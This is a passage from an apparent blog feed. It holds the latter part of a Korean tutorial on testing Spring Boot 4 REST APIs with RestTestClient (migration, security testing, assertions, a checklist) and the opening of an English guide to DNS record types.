class="o">&lt;</span><span class="nc">String</span><span class="o">&gt;</span> <span class="n">response</span> <span class="o">=</span> <span class="n">restTemplate</span><span class="o">.</span><span class="na">getForEntity</span><span class="o">(</span><span class="s">"/api/books/1"</span><span class="o">,</span> <span class="nc">String</span><span class="o">.</span><span class="na">class</span><span class="o">);</span> <span class="n">assertThat</span><span class="o">(</span><span class="n">response</span><span class="o">.</span><span class="na">getStatusCode</span><span class="o">()).</span><span class="na">isEqualTo</span><span class="o">(</span><span class="nc">HttpStatus</span><span class="o">.</span><span class="na">OK</span><span class="o">);</span> </code></pre></div></div> <p><strong>Modern (RestTestClient):</strong></p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">client</span><span class="o">.</span><span class="na">get</span><span class="o">().</span><span class="na">uri</span><span class="o">(</span><span class="s">"/api/books/1"</span><span class="o">)</span> <span class="o">.</span><span class="na">exchange</span><span class="o">()</span> <span class="o">.</span><span class="na">expectStatus</span><span class="o">().</span><span class="na">isOk</span><span class="o">();</span> </code></pre></div></div> <p>코드가 간결해지고, ‘요청’과 ‘검증’이 하나의 흐름으로 연결되어 가독성이 향상됩니다.</p> <h3 id="예제-2-복잡한-json-응답-검증">예제 2: 복잡한 JSON 응답 검증</h3> <p><strong>Legacy:</strong></p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nc">Book</span> <span class="n">book</span> <span class="o">=</span> <span class="n">restTemplate</span><span class="o">.</span><span class="na">getForObject</span><span class="o">(</span><span class="s">"/api/books/1"</span><span class="o">,</span> <span class="nc">Book</span><span class="o">.</span><span class="na">class</span><span class="o">);</span> <span class="n">assertThat</span><span class="o">(</span><span class="n">book</span><span class="o">.</span><span class="na">getTitle</span><span class="o">()).</span><span class="na">isEqualTo</span><span class="o">(</span><span class="s">"Spring Boot 4"</span><span class="o">);</span> <span class="n">assertThat</span><span class="o">(</span><span class="n">book</span><span class="o">.</span><span class="na">getAuthor</span><span class="o">()).</span><span class="na">isEqualTo</span><span class="o">(</span><span class="s">"Expert"</span><span class="o">);</span> </code></pre></div></div> <p><strong>Modern:</strong></p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">client</span><span class="o">.</span><span class="na">get</span><span class="o">().</span><span class="na">uri</span><span class="o">(</span><span class="s">"/api/books/1"</span><span class="o">)</span> <span class="o">.</span><span class="na">exchange</span><span class="o">()</span> <span class="o">.</span><span class="na">expectStatus</span><span class="o">().</span><span class="na">isOk</span><span class="o">()</span> <span class="o">.</span><span class="na">expectBody</span><span class="o">(</span><span class="nc">Book</span><span class="o">.</span><span class="na">class</span><span class="o">)</span> <span class="o">.</span><span class="na">value</span><span class="o">(</span><span class="n">book</span> <span class="o">-&gt;</span> <span class="o">{</span> <span class="n">assertThat</span><span class="o">(</span><span class="n">book</span><span class="o">.</span><span class="na">title</span><span class="o">()).</span><span class="na">isEqualTo</span><span class="o">(</span><span class="s">"Spring Boot 4"</span><span class="o">);</span> <span class="n">assertThat</span><span class="o">(</span><span class="n">book</span><span class="o">.</span><span class="na">author</span><span class="o">()).</span><span class="na">isEqualTo</span><span class="o">(</span><span class="s">"Expert"</span><span class="o">);</span> <span class="o">});</span> </code></pre></div></div> <p><code class="language-plaintext highlighter-rouge">value()</code> 메서드를 통해 람다 표현식 내부에서 AssertJ를 활용하므로, 객체 추출 과정을 명시적으로 작성할 필요 없이 직관적인 검증이 가능합니다.</p> <h2 id="마이그레이션-주의사항">마이그레이션 주의사항</h2> <p><strong>의존성 충돌:</strong> Spring Boot 4.0 업그레이드 시, 이전에 Deprecated되었던 메서드나 클래스가 완전히 삭제되었으므로, 3.x 버전의 최신 릴리스(3.5.x)에서 경고를 먼저 해결하고 넘어가는 것이 안전합니다.</p> <p><strong>컴파일 오류:</strong> TestRestTemplate 관련 컴파일 오류 발생 시, 테스트 스코프 의존성(<code class="language-plaintext highlighter-rouge">spring-boot-resttestclient</code>)이 올바르게 추가되었는지 확인해야 합니다.</p> <p><strong>제네릭 타입 처리:</strong> RestTestClient는 <code class="language-plaintext highlighter-rouge">ParameterizedTypeReference</code>를 지원하여 <code class="language-plaintext highlighter-rouge">List&lt;T&gt;</code>와 같은 제네릭 타입의 응답 본문을 더욱 안전하게 처리할 수 있습니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">client</span><span class="o">.</span><span class="na">get</span><span class="o">().</span><span class="na">uri</span><span class="o">(</span><span class="s">"/api/books"</span><span class="o">)</span> <span class="o">.</span><span class="na">exchange</span><span class="o">()</span> <span class="o">.</span><span class="na">expectStatus</span><span class="o">().</span><span class="na">isOk</span><span class="o">()</span> <span class="o">.</span><span class="na">expectBody</span><span class="o">(</span><span class="k">new</span> <span class="nc">ParameterizedTypeReference</span><span class="o">&lt;</span><span class="nc">List</span><span class="o">&lt;</span><span class="nc">Book</span><span class="o">&gt;&gt;()</span> <span class="o">{})</span> <span class="o">.</span><span class="na">value</span><span class="o">(</span><span class="n">books</span> <span class="o">-&gt;</span> <span class="n">assertThat</span><span class="o">(</span><span class="n">books</span><span class="o">).</span><span class="na">hasSize</span><span class="o">(</span><span class="mi">3</span><span class="o">));</span> </code></pre></div></div> <hr /> <h1 id="보안-테스팅-csrf와-인증-통합">보안 테스팅: CSRF와 인증 통합</h1> <p>Spring Security 7과 결합된 환경에서 RestTestClient를 사용하는 방법은 바인딩 전략에 따라 크게 달라집니다. 보안 테스트는 애플리케이션 무결성을 보장하는 가장 중요한 단계입니다.</p> <h2 id="mockmvc-바인딩-mock-환경에서의-보안">MockMvc 바인딩: Mock 환경에서의 보안</h2> <p><code class="language-plaintext highlighter-rouge">bindToMockMvc</code> 또는 <code class="language-plaintext highlighter-rouge">bindToApplicationContext</code>를 사용할 때, Spring Security의 필터 체인은 서블릿 컨테이너 없이 Mock 환경에서 동작합니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@SpringBootTest</span> <span class="nd">@AutoConfigureMockMvc</span> <span class="kd">class</span> <span class="nc">SecureBookControllerTest</span> <span class="o">{</span> <span class="nd">@Autowired</span> <span class="kd">private</span> <span class="nc">WebApplicationContext</span> <span class="n">context</span><span class="o">;</span> <span class="nd">@Test</span> <span class="kt">void</span> <span class="nf">testWithSpringSecurity</span><span class="o">()</span> <span class="o">{</span> <span class="nc">MockMvc</span> <span class="n">mockMvc</span> <span class="o">=</span> <span class="nc">MockMvcBuilders</span> <span class="o">.</span><span class="na">webAppContextSetup</span><span class="o">(</span><span class="n">context</span><span class="o">)</span> <span class="o">.</span><span class="na">apply</span><span class="o">(</span><span class="n">springSecurity</span><span class="o">())</span> <span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="nc">RestTestClient</span> <span class="n">client</span> <span class="o">=</span> <span class="nc">RestTestClient</span><span class="o">.</span><span class="na">bindTo</span><span class="o">(</span><span class="n">mockMvc</span><span class="o">).</span><span class="na">build</span><span class="o">();</span> <span class="n">client</span><span class="o">.</span><span class="na">post</span><span class="o">().</span><span class="na">uri</span><span class="o">(</span><span class="s">"/api/books"</span><span class="o">)</span> <span class="o">.</span><span class="na">contentType</span><span class="o">(</span><span class="nc">MediaType</span><span class="o">.</span><span class="na">APPLICATION_JSON</span><span class="o">)</span> <span class="o">.</span><span class="na">body</span><span class="o">(</span><span class="k">new</span> <span class="nc">Book</span><span class="o">(</span><span class="kc">null</span><span class="o">,</span> <span class="s">"Secure Book"</span><span class="o">))</span> <span class="o">.</span><span class="na">exchange</span><span class="o">()</span> <span class="o">.</span><span class="na">expectStatus</span><span class="o">().</span><span class="na">isForbidden</span><span class="o">();</span> <span class="c1">// CSRF 토큰 없음</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <p><strong>설정 자동화:</strong> <code class="language-plaintext highlighter-rouge">SecurityMockMvcConfigurers.springSecurity()</code>를 MockMvc 빌더에 적용함으로써, 스프링 시큐리티 필터가 테스트 파이프라인에 통합됩니다.</p> <p><strong>CSRF 토큰 처리:</strong> RestTestClient는 Mock 환경에서 CSRF 토큰을 자동으로 주입받지 못할 수 있습니다. MockMvc의 RequestPostProcessor 기능을 활용하거나, 테스트 설정에서 CSRF를 비활성화할 수 있습니다. 가장 권장되는 방식은 bindTo 시점에 보안 설정이 완료된 MockMvc 인스턴스를 주입하는 것입니다.</p> <h2 id="live-server-실제-서버에서의-인증">Live Server: 실제 서버에서의 인증</h2> <p>실제 서버를 대상으로 하는 테스트에서는 모의 객체를 사용할 수 없습니다. 실제 클라이언트처럼 행동해야 합니다.</p> <h3 id="http-basic-auth">HTTP Basic Auth</h3> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">client</span><span class="o">.</span><span class="na">get</span><span class="o">().</span><span class="na">uri</span><span class="o">(</span><span class="s">"/secure"</span><span class="o">)</span> <span class="o">.</span><span class="na">header</span><span class="o">(</span><span class="s">"Authorization"</span><span class="o">,</span> <span class="s">"Basic "</span> <span class="o">+</span> <span class="nc">Base64</span><span class="o">.</span><span class="na">getEncoder</span><span class="o">().</span><span class="na">encodeToString</span><span class="o">(</span><span class="s">"user:pass"</span><span class="o">.</span><span class="na">getBytes</span><span class="o">()))</span> <span class="o">.</span><span class="na">exchange</span><span class="o">()</span> <span class="o">.</span><span class="na">expectStatus</span><span class="o">().</span><span class="na">isOk</span><span class="o">();</span> </code></pre></div></div> <h3 id="oauth2-및-jwt">OAuth2 및 JWT</h3> <p>OAuth2 리소스 서버를 테스트할 때는 유효한 JWT 토큰이 필요합니다.</p> <p><strong>Mocking 전략:</strong> 테스트용 프로파일에서 <code class="language-plaintext highlighter-rouge">JwtDecoder</code>를 Mock Bean으로 등록하여, 서명 검증 없이 임의의 토큰을 허용하도록 설정할 수 있습니다.</p> <p><strong>Real Token 전략:</strong> 통합 테스트 전용 계정으로 인증 서버(Keycloak 등, Testcontainers 활용 가능)에서 토큰을 발급받은 후, RestTestClient의 기본 헤더로 설정하여 테스트를 수행합니다. 이는 프로덕션 환경과 가장 유사한 검증 방식입니다.</p> <h3 id="csrf-핸드셰이크-시뮬레이션">CSRF 핸드셰이크 시뮬레이션</h3> <p><code class="language-plaintext highlighter-rouge">bindToServer</code> 모드에서 CSRF가 활성화된 엔드포인트(POST/PUT/DELETE)를 테스트하려면 브라우저와 동일한 핸드셰이크 과정이 필요합니다.</p> <ol> <li><strong>GET 요청:</strong> 안전한 메서드로 접근하여 서버로부터 CSRF 토큰(쿠키 또는 헤더)을 수신</li> <li><strong>토큰 추출:</strong> 응답 쿠키(XSRF-TOKEN)를 추출</li> <li><strong>POST 요청:</strong> 추출한 토큰을 요청 헤더(X-XSRF-TOKEN)에 포함하여 전송</li> </ol> <p>RestTestClient는 상태를 저장하지 않으므로(Stateless), 이러한 쿠키-헤더 매핑 로직을 테스트 유틸리티로 구현하여 재사용하는 것이 좋습니다.</p> <hr /> <h1 id="데이터-검증-assertj와-jsonpath">데이터 검증: AssertJ와 JSONPath</h1> <p>테스트의 신뢰도는 검증(Assertion)의 정밀도에 달려 있습니다. RestTestClient는 다양한 검증 도구와의 통합을 지원합니다.</p> <h2 id="assertj-통합">AssertJ 통합</h2> <p>Spring Boot 개발자들에게 익숙한 AssertJ는 가독성 높은 에러 메시지와 풍부한 API를 제공합니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">client</span><span class="o">.</span><span class="na">get</span><span class="o">().</span><span class="na">uri</span><span class="o">(</span><span class="s">"/api/books/1"</span><span class="o">)</span> <span class="o">.</span><span class="na">exchange</span><span class="o">()</span> <span class="o">.</span><span class="na">expectBody</span><span class="o">(</span><span class="nc">Book</span><span class="o">.</span><span class="na">class</span><span class="o">)</span> <span class="o">.</span><span class="na">value</span><span class="o">(</span><span class="n">book</span> <span class="o">-&gt;</span> <span class="o">{</span> <span class="n">assertThat</span><span class="o">(</span><span class="n">book</span><span class="o">.</span><span class="na">getTitle</span><span class="o">()).</span><span class="na">startsWith</span><span class="o">(</span><span class="s">"Spring"</span><span class="o">);</span> <span class="n">assertThat</span><span class="o">(</span><span class="n">book</span><span class="o">.</span><span class="na">getPages</span><span class="o">()).</span><span class="na">isGreaterThan</span><span class="o">(</span><span class="mi">100</span><span class="o">);</span> <span class="n">assertThat</span><span class="o">(</span><span class="n">book</span><span class="o">.</span><span class="na">getTags</span><span class="o">()).</span><span class="na">contains</span><span class="o">(</span><span class="s">"java"</span><span class="o">,</span> <span class="s">"spring"</span><span class="o">);</span> <span class="o">});</span> </code></pre></div></div> <p>단순한 값 비교를 넘어, 컬렉션의 포함 여부, 문자열 패턴 매칭 등 복잡한 비즈니스 규칙 검증에 탁월합니다.</p> <h2 id="jsonpath-활용">JSONPath 활용</h2> <p>구조적인 JSON 데이터를 검증할 때, 객체로 매핑하지 않고 원본 JSON 구조를 직접 검사해야 할 때가 있습니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">client</span><span class="o">.</span><span class="na">get</span><span class="o">().</span><span class="na">uri</span><span class="o">(</span><span class="s">"/api/books/1"</span><span class="o">)</span> <span class="o">.</span><span class="na">exchange</span><span class="o">()</span> <span class="o">.</span><span class="na">expectStatus</span><span class="o">().</span><span class="na">isOk</span><span class="o">()</span> <span class="o">.</span><span class="na">expectBody</span><span class="o">()</span> <span class="o">.</span><span class="na">jsonPath</span><span class="o">(</span><span class="s">"$.title"</span><span class="o">).</span><span class="na">isEqualTo</span><span class="o">(</span><span class="s">"Spring Boot 4"</span><span class="o">)</span> <span class="o">.</span><span class="na">jsonPath</span><span class="o">(</span><span class="s">"$.author.name"</span><span class="o">).</span><span class="na">isEqualTo</span><span class="o">(</span><span class="s">"Expert"</span><span class="o">)</span> <span class="o">.</span><span class="na">jsonPath</span><span class="o">(</span><span class="s">"$.tags[0]"</span><span class="o">).</span><span class="na">isEqualTo</span><span class="o">(</span><span class="s">"spring"</span><span class="o">);</span> </code></pre></div></div> <p><code class="language-plaintext highlighter-rouge">$.store.book.title</code>과 같은 경로 표현식을 사용하여 특정 필드의 존재 여부나 값을 검증합니다. 응답 스키마가 변경되었을 때 객체 매핑 에러 없이 유연하게 대처할 수 있습니다.</p> <h2 id="jsonunit-정교한-json-비교">JsonUnit: 정교한 JSON 비교</h2> <p>JSON 간의 비교가 필요한 경우, JsonUnit 라이브러리와 통합하여 엄격하거나 유연한 비교를 수행할 수 있습니다. 예를 들어, 배열의 순서를 무시하거나 특정 필드(ID, Timestamp)를 무시하고 비교하는 것이 가능합니다.</p> <hr /> <h1 id="spring-boot-4-생태계-변화">Spring Boot 4 생태계 변화</h1> <p>Spring Boot 4의 새로운 기능들은 테스팅 환경에도 지대한 영향을 미칩니다.</p> <h2 id="context-pausing-메모리-효율-혁신">Context Pausing: 메모리 효율 혁신</h2> <p>Spring Framework 7의 가장 혁신적인 테스팅 기능 중 하나는 컨텍스트 캐싱 메커니즘의 개선입니다.</p> <p>기존에는 테스트 슈트가 실행되는 동안 로딩된 모든 ApplicationContext가 메모리에 상주하며, 백그라운드 스레드나 커넥션 풀을 점유하고 있었습니다. 이는 대규모 프로젝트에서 OOM(Out of Memory)을 유발하거나 테스트 속도를 저하시키는 원인이었습니다.</p> <p>Spring 7부터는 현재 실행 중이지 않은 테스트의 컨텍스트를 ‘일시 중지(Pause)’하고, 필요시 ‘재개(Resume)’합니다. 이는 RestTestClient를 사용하는 수많은 통합 테스트들이 서로 간섭 없이, 그리고 적은 리소스로 수행될 수 있음을 의미합니다.</p> <h2 id="virtual-threads-블로킹-io의-혁명">Virtual Threads: 블로킹 I/O의 혁명</h2> <p>Java 21의 가상 스레드는 블로킹 I/O 처리의 패러다임을 바꿨습니다. RestTestClient가 <code class="language-plaintext highlighter-rouge">bindToServer</code> 모드에서 동작할 때, 내부 RestClient는 가상 스레드 친화적인 방식으로 동작하도록 최적화되어 있습니다.</p> <p>이는 다수의 외부 API 호출을 포함하는 통합 테스트 시나리오에서 스레드 고갈 없이 높은 처리량을 낼 수 있게 하며, 테스트 실행 속도 단축에도 기여합니다.</p> <h2 id="aot-컴파일-지원">AOT 컴파일 지원</h2> <p>Spring Boot 4는 GraalVM 네이티브 이미지를 위한 AOT 지원을 강화했습니다. 테스팅 환경에서도 AOT 처리를 고려한 설정이 필요하며, RestTestClient는 이러한 AOT 모드에서도 문제없이 동작하도록 설계되어, 네이티브 이미지 호환성 테스트(<code class="language-plaintext highlighter-rouge">@DisabledInAotMode</code> 등)를 용이하게 합니다.</p> <hr /> <h1 id="도구-비교-무엇을-선택할-것인가">도구 비교: 무엇을 선택할 것인가?</h1> <p>프로젝트 성격에 따라 올바른 도구를 선택하는 것이 중요합니다.</p> <table> <thead> <tr> <th>특성</th> <th>RestTestClient</th> <th>WebTestClient</th> <th>MockMvc</th> <th>TestRestTemplate</th> </tr> </thead> <tbody> <tr> <td>기반 스택</td> <td>Servlet (Sync)</td> <td>WebFlux (Async)</td> <td>Servlet (Mock)</td> <td>Servlet (Sync)</td> </tr> <tr> <td>API 스타일</td> <td>Fluent (Builder)</td> <td>Fluent (Builder)</td> <td>Static Builder</td> <td>Imperative</td> </tr> <tr> <td>Mock 지원</td> <td>완벽 지원 (Delegate)</td> <td>지원 (Adapter 필요)</td> <td>Native</td> <td>지원 안 함</td> </tr> <tr> <td>Live Server</td> <td>완벽 지원</td> <td>완벽 지원</td> <td>지원 안 함</td> <td>Native</td> </tr> <tr> <td>리액티브 의존성</td> <td>불필요</td> <td>필수 (Reactor)</td> <td>불필요</td> <td>불필요</td> </tr> <tr> <td>미래 전망</td> <td>표준 (Standard)</td> <td>표준 (Reactive)</td> <td>백엔드 엔진화</td> <td>Deprecated</td> </tr> </tbody> </table> <p><strong>시사점:</strong> RestTestClient는 MockMvc와 TestRestTemplate의 장점을 모두 흡수하고 단점을 보완한 ‘완전체’에 가깝습니다. 특히 리액티브 의존성 없이 Fluent API를 사용할 수 있다는 점은 기존 Spring MVC 프로젝트들에게 가장 큰 매력 포인트입니다.</p> <hr /> <h1 id="전략적-제언">전략적 제언</h1> <p>본 분석을 바탕으로 다음 전략을 제시합니다.</p> <h2 id="1-신규-프로젝트-무조건-resttestclient">1. 신규 프로젝트: 무조건 RestTestClient</h2> <p>Spring Boot 4 기반의 신규 프로젝트는 예외 없이 RestTestClient를 기본 테스팅 클라이언트로 채택해야 합니다. 단위 테스트(<code class="language-plaintext highlighter-rouge">bindToController</code>)부터 E2E 테스트(<code class="language-plaintext highlighter-rouge">bindToServer</code>)까지 단일 API로 통일함으로써 팀 내 기술 부채를 예방할 수 있습니다.</p> <h2 id="2-기존-프로젝트-점진적-마이그레이션">2. 기존 프로젝트: 점진적 마이그레이션</h2> <p><code class="language-plaintext highlighter-rouge">@AutoConfigureTestRestTemplate</code>을 활용하여 안정성을 유지하되, 신규 기능 개발 및 리팩토링 시점마다 RestTestClient로 전환하는 점진적 전략을 수립해야 합니다.</p> <h2 id="3-바인딩-전략의-이원화">3. 바인딩 전략의 이원화</h2> <ul> <li><strong>속도가 중요한 CI 파이프라인의 PR 단계:</strong> <code class="language-plaintext highlighter-rouge">bindToController</code> 및 <code class="language-plaintext highlighter-rouge">bindToMockMvc</code>를 주력으로 사용</li> <li><strong>배포 전 최종 검증 단계(Nightly Build):</strong> <code class="language-plaintext highlighter-rouge">bindToServer</code>를 활용한 E2E 테스트로 효율성과 신뢰성의 균형 확보</li> </ul> <h2 id="4-보안-테스트-강화">4. 보안 테스트 강화</h2> <p><code class="language-plaintext highlighter-rouge">bindToMockMvc</code>와 <code class="language-plaintext highlighter-rouge">SecurityMockMvcConfigurers</code>의 조합을 통해, 단순한 기능 구현 여부를 넘어 보안 필터 체인의 빈틈없는 검증을 자동화해야 합니다.</p> <hr /> <h1 id="마무리하며">마무리하며</h1> <p>RestTestClient는 단순한 도구의 교체가 아닙니다. 테스트 코드를 ‘검증해야 할 대상’에서 ‘살아있는 문서’로 변화시키는 촉매제입니다.</p> <p><strong>핵심 요약:</strong></p> <ol> <li><strong>통합된 인터페이스:</strong> Mock과 Live Server를 단일 API로 처리</li> <li><strong>Fluent API:</strong> 선언적이고 가독성 높은 테스트 코드</li> <li><strong>바인딩 전략:</strong> 시나리오에 맞는 실행 엔진 선택</li> <li><strong>Spring Boot 4 최적화:</strong> Context Pausing, Virtual Threads, AOT 지원</li> <li><strong>마이그레이션:</strong> TestRestTemplate에서 점진적 전환</li> </ol> <p>오랜만에 테스팅 코드를 작성하거나, Spring Boot 4 마이그레이션을 준비 중이라면 이 글을 북마크해두세요. 필요할 때 다시 읽어보면 도움이 될 겁니다! 🚀</p> <hr /> <h1 id="부록-빠른-참조표">부록: 빠른 참조표</h1> <h2 id="주요-assertj-검증-패턴">주요 AssertJ 검증 패턴</h2> <table> <thead> <tr> <th>검증 대상</th> <th>기존 방식 (TestRestTemplate + AssertJ)</th> <th>권장 방식 (RestTestClient)</th> </tr> </thead> <tbody> <tr> <td>상태 코드</td> <td><code class="language-plaintext highlighter-rouge">assertThat(resp.getStatusCode()).isEqualTo(HttpStatus.OK)</code></td> <td><code class="language-plaintext highlighter-rouge">.expectStatus().isOk()</code></td> </tr> <tr> <td>헤더 존재</td> <td><code class="language-plaintext highlighter-rouge">assertThat(resp.getHeaders().containsKey("X-Token")).isTrue()</code></td> <td><code class="language-plaintext highlighter-rouge">.expectHeader().exists("X-Token")</code></td> </tr> <tr> <td>JSON 필드</td> <td><code class="language-plaintext highlighter-rouge">assertThat(resp.getBody().get("name")).isEqualTo("Test")</code></td> <td><code class="language-plaintext highlighter-rouge">.expectBody().jsonPath("$.name").isEqualTo("Test")</code></td> </tr> <tr> <td>객체 동등성</td> <td><code class="language-plaintext highlighter-rouge">assertThat(resp.getBody()).usingRecursiveComparison().isEqualTo(dto)</code></td> <td><code class="language-plaintext highlighter-rouge">.expectBody(Dto.class).isEqualTo(dto)</code></td> </tr> </tbody> </table> <h2 id="spring-boot-4-마이그레이션-체크리스트">Spring Boot 4 마이그레이션 체크리스트</h2> <ul class="task-list"> <li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Java 버전이 17 이상인지 확인 (권장: Java 21 LTS)</li> <li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><code class="language-plaintext highlighter-rouge">spring-boot-starter-parent</code> 버전을 4.0.0 이상으로 변경</li> <li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><code class="language-plaintext highlighter-rouge">spring-boot-resttestclient</code> 의존성 추가 여부 확인 (필요 시)</li> <li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />기존 TestRestTemplate 테스트에 <code class="language-plaintext highlighter-rouge">@AutoConfigureTestRestTemplate</code> 추가</li> <li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" /><code class="language-plaintext highlighter-rouge">javax.*</code> 패키지 import를 <code class="language-plaintext highlighter-rouge">jakarta.*</code>로 일괄 변경 (Servlet 6.1, JPA 3.2 대응)</li> <li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />주요 통합 테스트 시나리오 하나를 선정하여 RestTestClient로 변환 후 성능 및 가독성 비교</li> </ul> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> Wed, 14 Jan 2026 14:00:00 +0900 http://thecodinglog.github.io/spring/spring-boot/2026/01/14/springboot4-restapi-test.html http://thecodinglog.github.io/spring/spring-boot/2026/01/14/springboot4-restapi-test.html SpringBoot Spring-boot RESTAPI테스트 Spring Spring-boot DNS Records - Your Memory Refresher Guide 🌐 <p>Ever stared at your DNS settings panel and thought “Wait, what’s the difference between an A record and a CNAME again?” You’re definitely not alone. After a few weeks away from DNS configuration, all those record types start blending together. This guide will help you rebuild that mental model and understand what’s actually happening when you set up your domain.</p> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> <h1 id="whats-dns-anyway">What’s DNS Anyway?</h1> <p>Think of DNS (Domain Name System) as the internet’s phonebook. When you type <code class="language-plaintext highlighter-rouge">example.com</code> into your browser, DNS translates that human-friendly name into an IP address like <code class="language-plaintext highlighter-rouge">192.0.2.1</code> that computers actually understand.</p> <p>DNS records are the individual entries in this phonebook—each one contains specific information about how to handle requests for your domain.</p> <h1 id="the-big-picture-record-types-at-a-glance">The Big Picture: Record Types at a Glance</h1> <p>Before diving deep, here’s a quick reference table you’ll want to bookmark:</p> <table> <thead> <tr> <th>Record Type</th> <th>Purpose</th> <th>Example</th> </tr> </thead> <tbody> <tr> <td><strong>A</strong></td> <td>Maps domain to IPv4 address</td> <td>example.com → 123.123.123.123</td> </tr> <tr> <td><strong>AAAA</strong></td> <td>Maps domain to IPv6 address</td> <td>example.com → 2001:0db8:85a3::7334</td> </tr> <tr> <td><strong>CNAME</strong></td> <td>Creates domain alias</td> <td>www.example.com → example.com</td> </tr> <tr> <td><strong>NS</strong></td> <td>Specifies authoritative nameservers</td> <td>example.com → ns1.dnsprovider.com</td> </tr> </tbody> </table> <p>Now let’s break these down properly.</p> <h1 id="a-record-the-foundation">A Record: The Foundation</h1> <p>The A record (Address Record) is the most fundamental DNS record. It’s what actually connects your domain name to a server’s location.</p> <p><strong>What it does:</strong> Maps a domain name directly to an IPv4 address</p> <p><strong>Why you need it:</strong> This is how browsers find your website</p> <p><strong>Example:</strong></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>example.com A 192.0.2.1 </code></pre></div></div> <p>When someone types <code class="language-plaintext highlighter-rouge">example.com</code> into their browser, DNS looks up the A record and says “Ah, that’s at 192.0.2.1!” Then the browser connects to that IP address.</p> <h3 id="real-world-scenario">Real-World Scenario</h3> <p>Imagine you’re launching a new web application. You’ve got a server at <code class="language-plaintext highlighter-rouge">203.0.113.10</code> and you just registered <code class="language-plaintext highlighter-rouge">myapp.com</code>. You create an A record:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>myapp.com A 203.0.113.10 </code></pre></div></div> <p>Now when users visit <code class="language-plaintext highlighter-rouge">myapp.com</code>, they’re connecting directly to your server. Simple, clean, effective.</p> <h1 id="aaaa-record-the-ipv6-cousin">AAAA Record: The IPv6 Cousin</h1> <p>The AAAA record (pronounced “quad-A”) is basically the A record’s modern sibling.</p> <p><strong>What it does:</strong> Maps a domain name to an IPv6 address</p> <p><strong>Why it exists:</strong> IPv4 addresses are running out. IPv6 solves this with a massive address space.</p> <p><strong>Example:</strong></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>example.com AAAA 2001:0db8:85a3:0000:0000:8a2e:0370:7334 </code></pre></div></div> <h3 id="a-vs-aaaa-the-quick-comparison">A vs AAAA: The Quick Comparison</h3> <table> <thead> <tr> <th>Feature</th> <th>A Record</th> <th>AAAA Record</th> </tr> </thead> <tbody> <tr> <td>IP Version</td> <td>IPv4 (32-bit)</td> <td>IPv6 (128-bit)</td> </tr> <tr> <td>Address Format</td> <td>203.0.113.10</td> <td>2001:db8::1</td> </tr> <tr> <td>Address Space</td> <td>~4.3 billion addresses</td> <td>340 undecillion addresses (yeah, that’s a real number)</td> </tr> <tr> <td>Current Usage</td> <td>Universal</td> <td>Growing rapidly</td> </tr> </tbody> </table> <h3 id="why-you-should-care-about-ipv6">Why You Should Care About IPv6</h3> <p>Here’s the thing: IPv4 addresses ran out years ago. We’re currently using various workarounds (like NAT) to keep things running, but IPv6 is the future. Major platforms—Google, Facebook, Netflix—are already fully IPv6 enabled.</p> <p><strong>Pro tip:</strong> Run both A and AAAA records. Some networks and devices prefer IPv6, while others still rely on IPv4. Having both ensures maximum compatibility.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>example.com A 203.0.113.10 example.com AAAA 2001:db8:85a3::1 </code></pre></div></div> <h1 id="cname-record-the-alias-master">CNAME Record: The Alias Master</h1> <p>CNAME (Canonical Name) records create aliases. Instead of pointing to an IP address, they point to another domain name.</p> <p><strong>What it does:</strong> Creates an alias from one domain to another</p> <p><strong>Why you need it:</strong> Avoid duplicate configuration and simplify management</p> <p><strong>Example:</strong></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www.example.com CNAME example.com </code></pre></div></div> <p>When someone visits <code class="language-plaintext highlighter-rouge">www.example.com</code>, DNS says “That’s actually just <code class="language-plaintext highlighter-rouge">example.com</code>” and then looks up the A record for <code class="language-plaintext highlighter-rouge">example.com</code>.</p> <h3 id="when-cname-shines">When CNAME Shines</h3> <p><strong>Scenario 1: Subdomain Management</strong></p> <p>You’re running multiple services under one domain:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www.example.com CNAME example.com blog.example.com CNAME example.com shop.example.com CNAME example.com </code></pre></div></div> <p>Now if you change servers (and thus your IP address), you only need to update the A record for <code class="language-plaintext highlighter-rouge">example.com</code>. All the CNAMEs automatically follow.</p> <p><strong>Scenario 2: CDN Integration</strong></p> <p>You want to use Cloudflare’s CDN:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cdn.example.com CNAME example.cloudflarecdn.com </code></pre></div></div> 